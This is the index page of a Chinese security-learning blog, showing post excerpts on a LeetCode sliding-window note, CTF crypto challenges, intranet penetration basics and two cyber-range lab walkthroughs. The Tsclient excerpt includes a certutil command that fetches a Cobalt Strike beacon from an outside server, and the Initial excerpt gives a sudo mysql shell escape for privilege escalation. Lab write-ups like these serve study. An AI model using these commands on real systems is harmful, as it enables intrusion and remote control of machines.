滑动窗口
这是我学习算法入门用以记录的博客,记录了对应的leetcode题目及我的code,错误原因及改进分析 参考灵茶山艾府大神的文章 一、定长滑动窗口 核心思想: 对于定长滑窗问题,在滑动过程中无需重新遍历整个窗口空间,而只考虑移除部分和添加部分 窗口右端口在iii时,由于窗口长度为kkk,所以窗口左端点为i−k+1i-k+1i−k+1 总结为三个步骤:进-更新-出: 入:下标为iii的元素进入窗口,更新相关统计量。如果窗口左端点i−k+1<0i-k+1<0i−k+1<0,即i<k−1i<k-1i<k−1,则尚未进入第一个窗口,重复第一步 更新:更新答案。一般都是更新最大值/最小值 出:下标为i−k+1i-k+1i−k+1的元素离开窗口,更新相关统计量,为下一次循环做准备 1456.定长子串中元音的最大数目 给你字符串 s 和整数 k 。 请返回字符串 s 中长度为 k 的单个子字符串中可能包含的最大元音字母数。 英文中的 元音字母 为(a, e, i, o, u)。 mycode: 12345678910111213141516clas...
NepCTF 2025
nepsign 题面: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283from gmssl import sm3from random import SystemRandomfrom ast import literal_evalimport osflag = os.environ["FLAG"]def SM3(data): d = [i for i in data] h = sm3.sm3_hash(d) return hdef SM3_n(data, n=1, bits=256): for _ in range(n): data = bytes.fromhex(SM3(data)) return data.hex()[:bits // 4]class...
L3HCTF-2025
EzECDSA 题面: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748import hashlibimport randomfrom ecdsa import NIST256p, SigningKeyclass FlawedNonceGenerator: def __init__(self, n): self.n = n self.a = random.randrange(1, n) self.b = random.randrange(1, n) self.c = random.randrange(1, n) self.last_k = random.randrange(1, n) print(f'a,b,c = {self.a,self.b,self.c}') def generate_nonce(self): ...
初识内网渗透
内网渗透,大概理解为对目标服务器所在的内网进行渗透,而往往最终目标就是获取域控权限。 Linux内网渗透 信息收集 获取内核,操作系统和设备的信息 版本信息: uname -a 所有版本 uname -r 内核版本信息 uname -n 系统主机名称 uname -m Linux内核框架 Linux:表示操作系统内核名称 kali:主机名(hostname),这是这台机器在网络中的名称 6.12.20-amd64:内核版本号 #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025: #1:表示这是该内核构建的第 1 次编译 SMP:支持对称多处理(Symmetric Multi-Processing) PREEMPT_DYNAMIC:表示内核启用了动态抢占支持,适合桌面或低延迟场景 后面是编译时间:2025年4月15日 19:04:15 UTC Kali 6.12.20-1kali1 (2025-03-26): 表示这是由 Kali 官方打包的定制内核。 6....
春秋云镜-Tsclient
flag1 1.mssql弱口令 fscan扫描发现存在mssql的弱口令 MDUT连接 whoami查看一下,发现是一个比较低的权限 然后 whoami /priv 查看一下当前用户账户的特权,以及这些特权是否被启用 发现身份验证后模拟客户端已启用,所以是可以用sweetpotato进行提权的 2.上线cs,土豆提权 那么接下来就是要上传文件,可以考虑用数据库命令一个一个上传文件,但是为了方便可以先上传cs,然后在cs上传其他文件 创建一个监听器 生成攻击载荷: 由于靶机是访问公网的,所以先把这个载荷上传到服务器上,然后通过命令从服务器上得到载荷,要先在服务器上起一个http服务 之所以选择在Public目录下是因为默认的当前目录我们没有可执行权限,则写入时无法保存 1certutil -f -split -urlcache http://101.37.161.238/beacon_x64.exe C:\Users\Public\beacon_x64.exe 这样我们就成功上传了这个cs的载荷,运行之后,发现我们的cs也就成功上线了 在使用前记得修改回连间隔...
春秋云镜-Initial
flag1: fscan扫一下,发现有thinkphp的洞 thinkphp-rce thinkphpGUI嗦一下,发现是ThinkPHP 5.0.23 RCE 蚁剑连接,找到flag的位置,但是权限不够 检验一下,发现是www-data权限,然后sudo -l看一下可以用sudo执行的命令 12User www-data may run the following commands on ubuntu-web01: (root) NOPASSWD: /usr/bin/mysql sudo提权-mysql 可以用数据库执行命令sudo mysql -e '\!'拿到第一段flag ifconfig发现内网网段为172.22.1.*,然后上传fscan去扫内网(记得要给fscan可执行权限) flag2: 先来整理一下 1234MS17-010 172.22.1.21http://172.22.1.18?m=login 信呼协同办公系统http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1 已穿172.22....
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick Start Create a new post 1$ hexo new "My New Post" More info: Writing Run server 1$ hexo server More info: Server Generate static files 1$ hexo generate More info: Generating Deploy to remote sites 1$ hexo deploy More info: Deployment